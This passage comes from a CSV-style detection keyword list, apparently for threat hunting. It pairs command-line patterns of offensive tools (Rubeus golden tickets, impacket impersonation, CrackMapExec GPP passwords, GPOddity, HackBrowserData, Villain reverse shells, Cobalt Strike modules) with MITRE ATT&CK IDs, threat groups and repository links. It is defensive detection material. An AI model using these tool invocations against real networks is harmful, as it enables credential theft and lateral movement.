Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-ExfilDataToGitHub.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* giop-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* github repos list --org*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* github repos list --user *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* give-dcsync*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* give-genericall * -target-sid *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* gkrellm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -* --gmsa-decrypt-lsa *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* go build -o padre .*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -* golden * /badpwdcount*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* golden * /ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* golden * /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* gopher-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* gophish-*.zip*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* 'GPODDITY$' *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --gpo-id * --domain * --command *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation 
tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --gpo-id * --gpo-type * --no-smb-server *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --GPOName * --FilterEnabled --TargetDnsName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* gpp_autologin*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* gpp_password*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* gpsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* GreatSCT/*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* --greeting * --personalize *--securelink*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,0,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -* -grouper2 -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -H * -u * -p * -r *C$/Users*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -* -h *-p * -c cypher.bin -k key.bin*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -* hack.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* HackBrowserData,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -* HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,0,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -* hackergu *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-datanode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-jobtracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-secondary-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-tasktracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Hak5.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* harvest * /monitorinterval:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* -hasbootstraphint *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* -hashes * -spn * -impersonate *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -hashes lm:nt -gpo-id * -powershell *,offensive_tool_keyword,pyGPOAbuse,python implementation of SharpGPOAbuse,T1566.001 - T1059.006 - T1112,TA0001 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/Hackndo/pyGPOAbuse,1,0,N/A,8,2,178,26,2023-01-20T19:02:09Z,2020-05-10T21:21:27Z -* --hash-type * --attack-mode *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -* hashview-agent *,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -* havoc-client*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -* hbase-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hbase-region-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hddtemp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* HiddenDesktop.cna*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -* hnap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --hoax-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -* hollow.x64.*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/boku7/HOLLOW,1,0,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -* --host * --port * --executable *.exe --command *cmd.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* host -p * --allow-anonymous --protocol https*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* hostenum.py *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 